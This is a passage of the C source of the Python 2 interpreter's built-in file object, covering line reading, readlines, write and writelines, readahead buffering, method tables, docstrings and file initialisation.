non-get_unlocked() * platforms unless told not to. Yikes! Let's spell that out: * On a platform with getc_unlocked(): * By default, use getc_unlocked(). * If you want to use fgets() instead, #define USE_FGETS_IN_GETLINE. * On a platform without getc_unlocked(): * By default, use fgets(). * If you don't want to use fgets(), #define DONT_USE_FGETS_IN_GETLINE. */ #if !defined(USE_FGETS_IN_GETLINE) && !defined(HAVE_GETC_UNLOCKED) #define USE_FGETS_IN_GETLINE #endif #if defined(DONT_USE_FGETS_IN_GETLINE) && defined(USE_FGETS_IN_GETLINE) #undef USE_FGETS_IN_GETLINE #endif #ifdef USE_FGETS_IN_GETLINE static PyObject* getline_via_fgets(PyFileObject *f, FILE *fp) { /* INITBUFSIZE is the maximum line length that lets us get away with the fast * no-realloc, one-fgets()-call path. Boosting it isn't free, because we have * to fill this much of the buffer with a known value in order to figure out * how much of the buffer fgets() overwrites. 
So if INITBUFSIZE is larger * than "most" lines, we waste time filling unused buffer slots. 100 is * surely adequate for most people's email archives, chewing over source code, * etc -- "regular old text files". * MAXBUFSIZE is the maximum line length that lets us get away with the less * fast (but still zippy) no-realloc, two-fgets()-call path. See above for * cautions about boosting that. 300 was chosen because the worst real-life * text-crunching job reported on Python-Dev was a mail-log crawler where over * half the lines were 254 chars. */ #define INITBUFSIZE 100 #define MAXBUFSIZE 300 char* p; /* temp */ char buf[MAXBUFSIZE]; PyObject* v; /* the string object result */ char* pvfree; /* address of next free slot */ char* pvend; /* address one beyond last free slot */ size_t nfree; /* # of free buffer slots; pvend-pvfree */ size_t total_v_size; /* total # of slots in buffer */ size_t increment; /* amount to increment the buffer */ size_t prev_v_size; /* Optimize for normal case: avoid _PyString_Resize if at all * possible via first reading into stack buffer "buf". */ total_v_size = INITBUFSIZE; /* start small and pray */ pvfree = buf; for (;;) { FILE_BEGIN_ALLOW_THREADS(f) pvend = buf + total_v_size; nfree = pvend - pvfree; memset(pvfree, '\n', nfree); assert(nfree < INT_MAX); /* Should be at most MAXBUFSIZE */ p = fgets(pvfree, (int)nfree, fp); FILE_END_ALLOW_THREADS(f) if (p == NULL) { clearerr(fp); if (PyErr_CheckSignals()) return NULL; v = PyString_FromStringAndSize(buf, pvfree - buf); return v; } /* fgets read *something* */ p = memchr(pvfree, '\n', nfree); if (p != NULL) { /* Did the \n come from fgets or from us? * Since fgets stops at the first \n, and then writes * \0, if it's from fgets a \0 must be next. But if * that's so, it could not have come from us, since * the \n's we filled the buffer with have only more * \n's to the right. */ if (p+1 < pvend && *(p+1) == '\0') { /* It's from fgets: we win! In particular, * we haven't done any mallocs yet, and can * build the final result on the first try. */ ++p; /* include \n from fgets */ } else { /* Must be from us: fgets didn't fill the * buffer and didn't find a newline, so it * must be the last and newline-free line of * the file. */ assert(p > pvfree && *(p-1) == '\0'); --p; /* don't include \0 from fgets */ } v = PyString_FromStringAndSize(buf, p - buf); return v; } /* yuck: fgets overwrote all the newlines, i.e. the entire * buffer. So this line isn't over yet, or maybe it is but * we're exactly at EOF. If we haven't already, try using the * rest of the stack buffer. */ assert(*(pvend-1) == '\0'); if (pvfree == buf) { pvfree = pvend - 1; /* overwrite trailing null */ total_v_size = MAXBUFSIZE; } else break; } /* The stack buffer isn't big enough; malloc a string object and read * into its buffer. */ total_v_size = MAXBUFSIZE << 1; v = PyString_FromStringAndSize((char*)NULL, (int)total_v_size); if (v == NULL) return v; /* copy over everything except the last null byte */ memcpy(BUF(v), buf, MAXBUFSIZE-1); pvfree = BUF(v) + MAXBUFSIZE - 1; /* Keep reading stuff into v; if it ever ends successfully, break * after setting p one beyond the end of the line. The code here is * very much like the code above, except reads into v's buffer; see * the code above for detailed comments about the logic.
*/ for (;;) { FILE_BEGIN_ALLOW_THREADS(f) pvend = BUF(v) + total_v_size; nfree = pvend - pvfree; memset(pvfree, '\n', nfree); assert(nfree < INT_MAX); p = fgets(pvfree, (int)nfree, fp); FILE_END_ALLOW_THREADS(f) if (p == NULL) { clearerr(fp); if (PyErr_CheckSignals()) { Py_DECREF(v); return NULL; } p = pvfree; break; } p = memchr(pvfree, '\n', nfree); if (p != NULL) { if (p+1 < pvend && *(p+1) == '\0') { /* \n came from fgets */ ++p; break; } /* \n came from us; last line of file, no newline */ assert(p > pvfree && *(p-1) == '\0'); --p; break; } /* expand buffer and try again */ assert(*(pvend-1) == '\0'); increment = total_v_size >> 2; /* mild exponential growth */ prev_v_size = total_v_size; total_v_size += increment; /* check for overflow */ if (total_v_size <= prev_v_size || total_v_size > PY_SSIZE_T_MAX) { PyErr_SetString(PyExc_OverflowError, "line is longer than a Python string can hold"); Py_DECREF(v); return NULL; } if (_PyString_Resize(&v, (int)total_v_size) < 0) return NULL; /* overwrite the trailing null byte */ pvfree = BUF(v) + (prev_v_size - 1); } if (BUF(v) + total_v_size != p && _PyString_Resize(&v, p - BUF(v))) return NULL; return v; #undef INITBUFSIZE #undef MAXBUFSIZE } #endif /* ifdef USE_FGETS_IN_GETLINE */ /* Internal routine to get a line. Size argument interpretation: > 0: max length; <= 0: read arbitrary line */ static PyObject * get_line(PyFileObject *f, int n) { FILE *fp = f->f_fp; int c; char *buf, *end; size_t total_v_size; /* total # of slots in buffer */ size_t used_v_size; /* # used slots in buffer */ size_t increment; /* amount to increment the buffer */ PyObject *v; int newlinetypes = f->f_newlinetypes; int skipnextlf = f->f_skipnextlf; int univ_newline = f->f_univ_newline; #if defined(USE_FGETS_IN_GETLINE) if (n <= 0 && !univ_newline ) return getline_via_fgets(f, fp); #endif total_v_size = n > 0 ? n : 100; v = PyString_FromStringAndSize((char *)NULL, total_v_size); if (v == NULL) return NULL; buf = BUF(v); end = buf + total_v_size; for (;;) { FILE_BEGIN_ALLOW_THREADS(f) FLOCKFILE(fp); if (univ_newline) { c = 'x'; /* Shut up gcc warning */ while ( buf != end && (c = GETC(fp)) != EOF ) { if (skipnextlf ) { skipnextlf = 0; if (c == '\n') { /* Seeing a \n here with * skipnextlf true means we * saw a \r before. */ newlinetypes |= NEWLINE_CRLF; c = GETC(fp); if (c == EOF) break; } else { newlinetypes |= NEWLINE_CR; } } if (c == '\r') { skipnextlf = 1; c = '\n'; } else if ( c == '\n') newlinetypes |= NEWLINE_LF; *buf++ = c; if (c == '\n') break; } if (c == EOF) { if (ferror(fp) && errno == EINTR) { FUNLOCKFILE(fp); FILE_ABORT_ALLOW_THREADS(f) f->f_newlinetypes = newlinetypes; f->f_skipnextlf = skipnextlf; if (PyErr_CheckSignals()) { Py_DECREF(v); return NULL; } /* We executed Python signal handlers and got no exception. * Now back to reading the line where we left off. */ clearerr(fp); continue; } if (skipnextlf) newlinetypes |= NEWLINE_CR; } } else /* If not universal newlines use the normal loop */ while ((c = GETC(fp)) != EOF && (*buf++ = c) != '\n' && buf != end) ; FUNLOCKFILE(fp); FILE_END_ALLOW_THREADS(f) f->f_newlinetypes = newlinetypes; f->f_skipnextlf = skipnextlf; if (c == '\n') break; if (c == EOF) { if (ferror(fp)) { if (errno == EINTR) { if (PyErr_CheckSignals()) { Py_DECREF(v); return NULL; } /* We executed Python signal handlers and got no exception. * Now back to reading the line where we left off. 
*/ clearerr(fp); continue; } PyErr_SetFromErrno(PyExc_IOError); clearerr(fp); Py_DECREF(v); return NULL; } clearerr(fp); if (PyErr_CheckSignals()) { Py_DECREF(v); return NULL; } break; } /* Must be because buf == end */ if (n > 0) break; used_v_size = total_v_size; increment = total_v_size >> 2; /* mild exponential growth */ total_v_size += increment; if (total_v_size > PY_SSIZE_T_MAX) { PyErr_SetString(PyExc_OverflowError, "line is longer than a Python string can hold"); Py_DECREF(v); return NULL; } if (_PyString_Resize(&v, total_v_size) < 0) return NULL; buf = BUF(v) + used_v_size; end = BUF(v) + total_v_size; } used_v_size = buf - BUF(v); if (used_v_size != total_v_size && _PyString_Resize(&v, used_v_size)) return NULL; return v; } /* External C interface */ PyObject * PyFile_GetLine(PyObject *f, int n) { PyObject *result; if (f == NULL) { PyErr_BadInternalCall(); return NULL; } if (PyFile_Check(f)) { PyFileObject *fo = (PyFileObject *)f; if (fo->f_fp == NULL) return err_closed(); if (!fo->readable) return err_mode("reading"); /* refuse to mix with f.next() */ if (fo->f_buf != NULL && (fo->f_bufend - fo->f_bufptr) > 0 && fo->f_buf[0] != '\0') return err_iterbuffered(); result = get_line(fo, n); } else { PyObject *reader; PyObject *args; reader = PyObject_GetAttrString(f, "readline"); if (reader == NULL) return NULL; if (n <= 0) args = PyTuple_New(0); else args = Py_BuildValue("(i)", n); if (args == NULL) { Py_DECREF(reader); return NULL; } result = PyEval_CallObject(reader, args); Py_DECREF(reader); Py_DECREF(args); if (result != NULL && !PyString_Check(result) && !PyUnicode_Check(result)) { Py_DECREF(result); result = NULL; PyErr_SetString(PyExc_TypeError, "object.readline() returned non-string"); } } if (n < 0 && result != NULL && PyString_Check(result)) { char *s = PyString_AS_STRING(result); Py_ssize_t len = PyString_GET_SIZE(result); if (len == 0) { Py_DECREF(result); result = NULL; PyErr_SetString(PyExc_EOFError, "EOF when reading a line"); } else if (s[len-1] == '\n') { if (result->ob_refcnt == 1) { if (_PyString_Resize(&result, len-1)) return NULL; } else { PyObject *v; v = PyString_FromStringAndSize(s, len-1); Py_DECREF(result); result = v; } } } #ifdef Py_USING_UNICODE if (n < 0 && result != NULL && PyUnicode_Check(result)) { Py_UNICODE *s = PyUnicode_AS_UNICODE(result); Py_ssize_t len = PyUnicode_GET_SIZE(result); if (len == 0) { Py_DECREF(result); result = NULL; PyErr_SetString(PyExc_EOFError, "EOF when reading a line"); } else if (s[len-1] == '\n') { if (result->ob_refcnt == 1) PyUnicode_Resize(&result, len-1); else { PyObject *v; v = PyUnicode_FromUnicode(s, len-1); Py_DECREF(result); result = v; } } } #endif return result; } /* Python method */ static PyObject * file_readline(PyFileObject *f, PyObject *args) { int n = -1; if (f->f_fp == NULL) return err_closed(); if (!f->readable) return err_mode("reading"); /* refuse to mix with f.next() */ if (f->f_buf != NULL && (f->f_bufend - f->f_bufptr) > 0 && f->f_buf[0] != '\0') return err_iterbuffered(); if (!PyArg_ParseTuple(args, "|i:readline", &n)) return NULL; if (n == 0) return PyString_FromString(""); if (n < 0) n = 0; return get_line(f, n); } static PyObject * file_readlines(PyFileObject *f, PyObject *args) { long sizehint = 0; PyObject *list = NULL; PyObject *line; char small_buffer[SMALLCHUNK]; char *buffer = small_buffer; size_t buffersize = SMALLCHUNK; PyObject *big_buffer = NULL; size_t nfilled = 0; size_t nread; size_t totalread = 0; char *p, *q, *end; int err; int shortread = 0; /* bool, did the previous read come 
up short? */ if (f->f_fp == NULL) return err_closed(); if (!f->readable) return err_mode("reading"); /* refuse to mix with f.next() */ if (f->f_buf != NULL && (f->f_bufend - f->f_bufptr) > 0 && f->f_buf[0] != '\0') return err_iterbuffered(); if (!PyArg_ParseTuple(args, "|l:readlines", &sizehint)) return NULL; if ((list = PyList_New(0)) == NULL) return NULL; for (;;) { if (shortread) nread = 0; else { FILE_BEGIN_ALLOW_THREADS(f) errno = 0; nread = Py_UniversalNewlineFread(buffer+nfilled, buffersize-nfilled, f->f_fp, (PyObject *)f); FILE_END_ALLOW_THREADS(f) shortread = (nread < buffersize-nfilled); } if (nread == 0) { sizehint = 0; if (!ferror(f->f_fp)) break; if (errno == EINTR) { if (PyErr_CheckSignals()) { goto error; } clearerr(f->f_fp); shortread = 0; continue; } PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); goto error; } totalread += nread; p = (char *)memchr(buffer+nfilled, '\n', nread); if (p == NULL) { /* Need a larger buffer to fit this line */ nfilled += nread; buffersize *= 2; if (buffersize > PY_SSIZE_T_MAX) { PyErr_SetString(PyExc_OverflowError, "line is longer than a Python string can hold"); goto error; } if (big_buffer == NULL) { /* Create the big buffer */ big_buffer = PyString_FromStringAndSize( NULL, buffersize); if (big_buffer == NULL) goto error; buffer = PyString_AS_STRING(big_buffer); memcpy(buffer, small_buffer, nfilled); } else { /* Grow the big buffer */ if ( _PyString_Resize(&big_buffer, buffersize) < 0 ) goto error; buffer = PyString_AS_STRING(big_buffer); } continue; } end = buffer+nfilled+nread; q = buffer; do { /* Process complete lines */ p++; line = PyString_FromStringAndSize(q, p-q); if (line == NULL) goto error; err = PyList_Append(list, line); Py_DECREF(line); if (err != 0) goto error; q = p; p = (char *)memchr(q, '\n', end-q); } while (p != NULL); /* Move the remaining incomplete line to the start */ nfilled = end-q; memmove(buffer, q, nfilled); if (sizehint > 0) if (totalread >= (size_t)sizehint) break; } if (nfilled != 0) { /* Partial last line */ line = PyString_FromStringAndSize(buffer, nfilled); if (line == NULL) goto error; if (sizehint > 0) { /* Need to complete the last line */ PyObject *rest = get_line(f, 0); if (rest == NULL) { Py_DECREF(line); goto error; } PyString_Concat(&line, rest); Py_DECREF(rest); if (line == NULL) goto error; } err = PyList_Append(list, line); Py_DECREF(line); if (err != 0) goto error; } cleanup: Py_XDECREF(big_buffer); return list; error: Py_CLEAR(list); goto cleanup; } static PyObject * file_write(PyFileObject *f, PyObject *args) { Py_buffer pbuf; const char *s; Py_ssize_t n, n2; PyObject *encoded = NULL; int err_flag = 0, err; if (f->f_fp == NULL) return err_closed(); if (!f->writable) return err_mode("writing"); if (f->f_binary) { if (!PyArg_ParseTuple(args, "s*", &pbuf)) return NULL; s = pbuf.buf; n = pbuf.len; } else { PyObject *text; if (!PyArg_ParseTuple(args, "O", &text)) return NULL; if (PyString_Check(text)) { s = PyString_AS_STRING(text); n = PyString_GET_SIZE(text); #ifdef Py_USING_UNICODE } else if (PyUnicode_Check(text)) { const char *encoding, *errors; if (f->f_encoding != Py_None) encoding = PyString_AS_STRING(f->f_encoding); else encoding = PyUnicode_GetDefaultEncoding(); if (f->f_errors != Py_None) errors = PyString_AS_STRING(f->f_errors); else errors = "strict"; encoded = PyUnicode_AsEncodedString(text, encoding, errors); if (encoded == NULL) return NULL; s = PyString_AS_STRING(encoded); n = PyString_GET_SIZE(encoded); #endif } else { if (PyObject_AsCharBuffer(text, &s, &n)) return NULL; } } 
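/* At this point s and n describe the bytes to write ("encoded" keeps any * temporary encoded copy alive); reset softspace and do the fwrite() with * the GIL released, remembering errno for the error path below. */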
f->f_softspace = 0; FILE_BEGIN_ALLOW_THREADS(f) errno = 0; n2 = fwrite(s, 1, n, f->f_fp); if (n2 != n || ferror(f->f_fp)) { err_flag = 1; err = errno; } FILE_END_ALLOW_THREADS(f) Py_XDECREF(encoded); if (f->f_binary) PyBuffer_Release(&pbuf); if (err_flag) { errno = err; PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); return NULL; } Py_INCREF(Py_None); return Py_None; } static PyObject * file_writelines(PyFileObject *f, PyObject *seq) { #define CHUNKSIZE 1000 PyObject *list, *line; PyObject *it; /* iter(seq) */ PyObject *result; int index, islist; Py_ssize_t i, j, nwritten, len; assert(seq != NULL); if (f->f_fp == NULL) return err_closed(); if (!f->writable) return err_mode("writing"); result = NULL; list = NULL; islist = PyList_Check(seq); if (islist) it = NULL; else { it = PyObject_GetIter(seq); if (it == NULL) { PyErr_SetString(PyExc_TypeError, "writelines() requires an iterable argument"); return NULL; } /* From here on, fail by going to error, to reclaim "it". */ list = PyList_New(CHUNKSIZE); if (list == NULL) goto error; } /* Strategy: slurp CHUNKSIZE lines into a private list, checking that they are all strings, then write that list without holding the interpreter lock, then come back for more. */ for (index = 0; ; index += CHUNKSIZE) { if (islist) { Py_XDECREF(list); list = PyList_GetSlice(seq, index, index+CHUNKSIZE); if (list == NULL) goto error; j = PyList_GET_SIZE(list); } else { for (j = 0; j < CHUNKSIZE; j++) { line = PyIter_Next(it); if (line == NULL) { if (PyErr_Occurred()) goto error; break; } PyList_SetItem(list, j, line); } /* The iterator might have closed the file on us. */ if (f->f_fp == NULL) { err_closed(); goto error; } } if (j == 0) break; /* Check that all entries are indeed strings. If not, apply the same rules as for file.write() and convert the results to strings. This is slow, but seems to be the only way since all conversion APIs could potentially execute Python code. */ for (i = 0; i < j; i++) { PyObject *v = PyList_GET_ITEM(list, i); if (!PyString_Check(v)) { const char *buffer; int res; if (f->f_binary) { res = PyObject_AsReadBuffer(v, (const void**)&buffer, &len); } else { res = PyObject_AsCharBuffer(v, &buffer, &len); } if (res) { PyErr_SetString(PyExc_TypeError, "writelines() argument must be a sequence of strings"); goto error; } line = PyString_FromStringAndSize(buffer, len); if (line == NULL) goto error; Py_DECREF(v); PyList_SET_ITEM(list, i, line); } } /* Since we are releasing the global lock, the following code may *not* execute Python code. 
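(Hence the conversion pass above: every item in "list" is already a plain string, so the fwrite() loop below cannot trigger conversion hooks or any other Python-level code.)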
*/ f->f_softspace = 0; FILE_BEGIN_ALLOW_THREADS(f) errno = 0; for (i = 0; i < j; i++) { line = PyList_GET_ITEM(list, i); len = PyString_GET_SIZE(line); nwritten = fwrite(PyString_AS_STRING(line), 1, len, f->f_fp); if (nwritten != len) { FILE_ABORT_ALLOW_THREADS(f) PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); goto error; } } FILE_END_ALLOW_THREADS(f) if (j < CHUNKSIZE) break; } Py_INCREF(Py_None); result = Py_None; error: Py_XDECREF(list); Py_XDECREF(it); return result; #undef CHUNKSIZE } static PyObject * file_self(PyFileObject *f) { if (f->f_fp == NULL) return err_closed(); Py_INCREF(f); return (PyObject *)f; } static PyObject * file_xreadlines(PyFileObject *f) { if (PyErr_WarnPy3k("f.xreadlines() not supported in 3.x, " "try 'for line in f' instead", 1) < 0) return NULL; return file_self(f); } static PyObject * file_exit(PyObject *f, PyObject *args) { PyObject *ret = PyObject_CallMethod(f, "close", NULL); if (!ret) /* If error occurred, pass through */ return NULL; Py_DECREF(ret); /* We cannot return the result of close since a true * value will be interpreted as "yes, swallow the * exception if one was raised inside the with block". */ Py_RETURN_NONE; } PyDoc_STRVAR(readline_doc, "readline([size]) -> next line from the file, as a string.\n" "\n" "Retain newline. A non-negative size argument limits the maximum\n" "number of bytes to return (an incomplete line may be returned then).\n" "Return an empty string at EOF."); PyDoc_STRVAR(read_doc, "read([size]) -> read at most size bytes, returned as a string.\n" "\n" "If the size argument is negative or omitted, read until EOF is reached.\n" "Notice that when in non-blocking mode, less data than what was requested\n" "may be returned, even if no size parameter was given."); PyDoc_STRVAR(write_doc, "write(str) -> None. Write string str to file.\n" "\n" "Note that due to buffering, flush() or close() may be needed before\n" "the file on disk reflects the data written."); PyDoc_STRVAR(fileno_doc, "fileno() -> integer \"file descriptor\".\n" "\n" "This is needed for lower-level file interfaces, such as os.read()."); PyDoc_STRVAR(seek_doc, "seek(offset[, whence]) -> None. Move to new file position.\n" "\n" "Argument offset is a byte count. Optional argument whence defaults to\n" "0 (offset from start of file, offset should be >= 0); other values are 1\n" "(move relative to current position, positive or negative), and 2 (move\n" "relative to end of file, usually negative, although many platforms allow\n" "seeking beyond the end of a file). If the file is opened in text mode,\n" "only offsets returned by tell() are legal. Use of other offsets causes\n" "undefined behavior." "\n" "Note that not all file objects are seekable."); #ifdef HAVE_FTRUNCATE PyDoc_STRVAR(truncate_doc, "truncate([size]) -> None. Truncate the file to at most size bytes.\n" "\n" "Size defaults to the current file position, as returned by tell()."); #endif PyDoc_STRVAR(tell_doc, "tell() -> current file position, an integer (may be a long integer)."); PyDoc_STRVAR(readinto_doc, "readinto() -> Undocumented. Don't use this; it may go away."); PyDoc_STRVAR(readlines_doc, "readlines([size]) -> list of strings, each a line from the file.\n" "\n" "Call readline() repeatedly and return a list of the lines so read.\n" "The optional size argument, if given, is an approximate bound on the\n" "total number of bytes in the lines returned."); PyDoc_STRVAR(xreadlines_doc, "xreadlines() -> returns self.\n" "\n" "For backward compatibility. 
File objects now include the performance\n" "optimizations previously implemented in the xreadlines module."); PyDoc_STRVAR(writelines_doc, "writelines(sequence_of_strings) -> None. Write the strings to the file.\n" "\n" "Note that newlines are not added. The sequence can be any iterable object\n" "producing strings. This is equivalent to calling write() for each string."); PyDoc_STRVAR(flush_doc, "flush() -> None. Flush the internal I/O buffer."); PyDoc_STRVAR(close_doc, "close() -> None or (perhaps) an integer. Close the file.\n" "\n" "Sets data attribute .closed to True. A closed file cannot be used for\n" "further I/O operations. close() may be called more than once without\n" "error. Some kinds of file objects (for example, opened by popen())\n" "may return an exit status upon closing."); PyDoc_STRVAR(isatty_doc, "isatty() -> true or false. True if the file is connected to a tty device."); PyDoc_STRVAR(enter_doc, "__enter__() -> self."); PyDoc_STRVAR(exit_doc, "__exit__(*excinfo) -> None. Closes the file."); static PyMethodDef file_methods[] = { {"readline", (PyCFunction)file_readline, METH_VARARGS, readline_doc}, {"read", (PyCFunction)file_read, METH_VARARGS, read_doc}, {"write", (PyCFunction)file_write, METH_VARARGS, write_doc}, {"fileno", (PyCFunction)file_fileno, METH_NOARGS, fileno_doc}, {"seek", (PyCFunction)file_seek, METH_VARARGS, seek_doc}, #ifdef HAVE_FTRUNCATE {"truncate", (PyCFunction)file_truncate, METH_VARARGS, truncate_doc}, #endif {"tell", (PyCFunction)file_tell, METH_NOARGS, tell_doc}, {"readinto", (PyCFunction)file_readinto, METH_VARARGS, readinto_doc}, {"readlines", (PyCFunction)file_readlines, METH_VARARGS, readlines_doc}, {"xreadlines",(PyCFunction)file_xreadlines, METH_NOARGS, xreadlines_doc}, {"writelines",(PyCFunction)file_writelines, METH_O, writelines_doc}, {"flush", (PyCFunction)file_flush, METH_NOARGS, flush_doc}, {"close", (PyCFunction)file_close, METH_NOARGS, close_doc}, {"isatty", (PyCFunction)file_isatty, METH_NOARGS, isatty_doc}, {"__enter__", (PyCFunction)file_self, METH_NOARGS, enter_doc}, {"__exit__", (PyCFunction)file_exit, METH_VARARGS, exit_doc}, {NULL, NULL} /* sentinel */ }; #define OFF(x) offsetof(PyFileObject, x) static PyMemberDef file_memberlist[] = { {"mode", T_OBJECT, OFF(f_mode), RO, "file mode ('r', 'U', 'w', 'a', possibly with 'b' or '+' added)"}, {"name", T_OBJECT, OFF(f_name), RO, "file name"}, {"encoding", T_OBJECT, OFF(f_encoding), RO, "file encoding"}, {"errors", T_OBJECT, OFF(f_errors), RO, "Unicode error handler"}, /* getattr(f, "closed") is implemented without this table */ {NULL} /* Sentinel */ }; static PyObject * get_closed(PyFileObject *f, void *closure) { return PyBool_FromLong((long)(f->f_fp == 0)); } static PyObject * get_newlines(PyFileObject *f, void *closure) { switch (f->f_newlinetypes) { case NEWLINE_UNKNOWN: Py_INCREF(Py_None); return Py_None; case NEWLINE_CR: return PyString_FromString("\r"); case NEWLINE_LF: return PyString_FromString("\n"); case NEWLINE_CR|NEWLINE_LF: return Py_BuildValue("(ss)", "\r", "\n"); case NEWLINE_CRLF: return PyString_FromString("\r\n"); case NEWLINE_CR|NEWLINE_CRLF: return Py_BuildValue("(ss)", "\r", "\r\n"); case NEWLINE_LF|NEWLINE_CRLF: return Py_BuildValue("(ss)", "\n", "\r\n"); case NEWLINE_CR|NEWLINE_LF|NEWLINE_CRLF: return Py_BuildValue("(sss)", "\r", "\n", "\r\n"); default: PyErr_Format(PyExc_SystemError, "Unknown newlines value 0x%x\n", f->f_newlinetypes); return NULL; } } static PyObject * get_softspace(PyFileObject *f, void *closure) { if (PyErr_WarnPy3k("file.softspace not 
supported in 3.x", 1) < 0) return NULL; return PyInt_FromLong(f->f_softspace); } static int set_softspace(PyFileObject *f, PyObject *value) { int new; if (PyErr_WarnPy3k("file.softspace not supported in 3.x", 1) < 0) return -1; if (value == NULL) { PyErr_SetString(PyExc_TypeError, "can't delete softspace attribute"); return -1; } new = PyInt_AsLong(value); if (new == -1 && PyErr_Occurred()) return -1; f->f_softspace = new; return 0; } static PyGetSetDef file_getsetlist[] = { {"closed", (getter)get_closed, NULL, "True if the file is closed"}, {"newlines", (getter)get_newlines, NULL, "end-of-line convention used in this file"}, {"softspace", (getter)get_softspace, (setter)set_softspace, "flag indicating that a space needs to be printed; used by print"}, {0}, }; typedef struct { char *buf, *bufptr, *bufend; } readaheadbuffer; static void drop_readaheadbuffer(readaheadbuffer *rab) { if (rab->buf != NULL) { PyMem_FREE(rab->buf); rab->buf = NULL; } } /* Make sure that file has a readahead buffer with at least one byte (unless at EOF) and no more than bufsize. Returns negative value on error, will set MemoryError if bufsize bytes cannot be allocated. */ static int readahead(PyFileObject *f, readaheadbuffer *rab, Py_ssize_t bufsize) { Py_ssize_t chunksize; if (rab->buf != NULL) { if ((rab->bufend - rab->bufptr) >= 1) return 0; else drop_readaheadbuffer(rab); } if ((rab->buf = PyMem_MALLOC(bufsize)) == NULL) { PyErr_NoMemory(); return -1; } FILE_BEGIN_ALLOW_THREADS(f) errno = 0; chunksize = Py_UniversalNewlineFread(rab->buf, bufsize, f->f_fp, (PyObject *)f); FILE_END_ALLOW_THREADS(f) if (chunksize == 0) { if (ferror(f->f_fp)) { PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); drop_readaheadbuffer(rab); return -1; } } rab->bufptr = rab->buf; rab->bufend = rab->buf + chunksize; return 0; } /* Used by file_iternext. The returned string will start with 'skip' uninitialized bytes followed by the remainder of the line. Don't be horrified by the recursive call: maximum recursion depth is limited by logarithmic buffer growth to about 50 even when reading a 1gb line. */ static PyStringObject * readahead_get_line_skip(PyFileObject *f, readaheadbuffer *rab, Py_ssize_t skip, Py_ssize_t bufsize) { PyStringObject* s; char *bufptr; char *buf; Py_ssize_t len; if (rab->buf == NULL) if (readahead(f, rab, bufsize) < 0) return NULL; len = rab->bufend - rab->bufptr; if (len == 0) return (PyStringObject *)PyString_FromStringAndSize(NULL, skip); bufptr = (char *)memchr(rab->bufptr, '\n', len); if (bufptr != NULL) { bufptr++; /* Count the '\n' */ len = bufptr - rab->bufptr; s = (PyStringObject *)PyString_FromStringAndSize(NULL, skip + len); if (s == NULL) return NULL; memcpy(PyString_AS_STRING(s) + skip, rab->bufptr, len); rab->bufptr = bufptr; if (bufptr == rab->bufend) drop_readaheadbuffer(rab); } else { bufptr = rab->bufptr; buf = rab->buf; rab->buf = NULL; /* Force new readahead buffer */ assert(len <= PY_SSIZE_T_MAX - skip); s = readahead_get_line_skip(f, rab, skip + len, bufsize + (bufsize>>2)); if (s == NULL) { PyMem_FREE(buf); return NULL; } memcpy(PyString_AS_STRING(s) + skip, bufptr, len); PyMem_FREE(buf); } return s; } /* A larger buffer size may actually decrease performance. */ #define READAHEAD_BUFSIZE 8192 static PyObject * file_iternext(PyFileObject *f) { PyStringObject* l; if (f->f_fp == NULL) return err_closed(); if (!f->readable) return err_mode("reading"); { /* Multiple threads can enter this method while the GIL is released during file read and wreak havoc on the file object's readahead buffer. 
To avoid dealing with cross-thread coordination issues, we cache the file buffer state locally and only set it back on the file object when we're done. */ readaheadbuffer rab = {f->f_buf, f->f_bufptr, f->f_bufend}; f->f_buf = NULL; l = readahead_get_line_skip(f, &rab, 0, READAHEAD_BUFSIZE); /* Make sure the file's internal read buffer is cleared out. This will only do anything if some other thread interleaved with us during readahead. We want to drop any changeling buffer, so we don't leak memory. We may lose data, but that's what you get for reading the same file object in multiple threads. */ drop_file_readahead(f); f->f_buf = rab.buf; f->f_bufptr = rab.bufptr; f->f_bufend = rab.bufend; } if (l == NULL || PyString_GET_SIZE(l) == 0) { Py_XDECREF(l); return NULL; } return (PyObject *)l; } static PyObject * file_new(PyTypeObject *type, PyObject *args, PyObject *kwds) { PyObject *self; static PyObject *not_yet_string; assert(type != NULL && type->tp_alloc != NULL); if (not_yet_string == NULL) { not_yet_string = PyString_InternFromString("<uninitialized file>"); if (not_yet_string == NULL) return NULL; } self = type->tp_alloc(type, 0); if (self != NULL) { /* Always fill in the name and mode, so that nobody else needs to special-case NULLs there. */ Py_INCREF(not_yet_string); ((PyFileObject *)self)->f_name = not_yet_string; Py_INCREF(not_yet_string); ((PyFileObject *)self)->f_mode = not_yet_string; Py_INCREF(Py_None); ((PyFileObject *)self)->f_encoding = Py_None; Py_INCREF(Py_None); ((PyFileObject *)self)->f_errors = Py_None; ((PyFileObject *)self)->weakreflist = NULL; ((PyFileObject *)self)->unlocked_count = 0; } return self; } static int file_init(PyObject *self, PyObject *args, PyObject *kwds) { PyFileObject *foself = (PyFileObject *)self; int ret = 0; static char *kwlist[] = {"name", "mode", "buffering", 0}; char *name = NULL; char *mode = "r"; int bufsize = -1; int wideargument = 0; #ifdef MS_WINDOWS PyObject *po; #endif assert(PyFile_Check(self)); if (foself->f_fp != NULL) { /* Have to close the existing file first. */ PyObject *closeresult = file_close(foself); if (closeresult == NULL) return -1; Py_DECREF(closeresult); } #ifdef MS_WINDOWS if (PyArg_ParseTupleAndKeywords(args, kwds, "U|si:file", kwlist, &po, &mode, &bufsize) && wcslen(PyUnicode_AS_UNICODE(po)) == (size_t)PyUnicode_GET_SIZE(po)) { wideargument = 1; if (fill_file_fields(foself, NULL, po, mode, fclose) == NULL) goto Error; } else { /* Drop the argument parsing error as narrow strings are also valid. */ PyErr_Clear(); } #endif if (!wideargument) { PyObject *o_name; if (!PyArg_ParseTupleAndKeywords(args, kwds, "et|si:file", kwlist, Py_FileSystemDefaultEncoding, &name, &mode, &bufsize)) return -1; /* We parse again to get the name as a PyObject */ if (!PyArg_ParseTupleAndKeywords(args, kwds, "O|si:file", kwlist, &o_name, &mode, &bufsize)) goto Error; if (fill_file_fields(foself, NULL, o_name, mode, fclose) == NULL) goto Error; } if (open_the_file(foself, name, mode) == NULL) goto Error; foself->f_setbuf = NULL; PyFile_SetBufSize(self, bufsize); goto Done; Error: ret = -1; /* fall through */ Done: PyMem_Free(name); /* free the encoded string */ return ret; } PyDoc_VAR(file_doc) = PyDoc_STR( "file(name[, mode[, buffering]]) -> file object\n" "\n" "Open a file. The mode can be 'r', 'w' or 'a' for reading (default),\n" "writing or appending. The file will be created if it doesn't exist\n" "when opened for writing or appending; it will be truncated when\n" "opened for writing. 
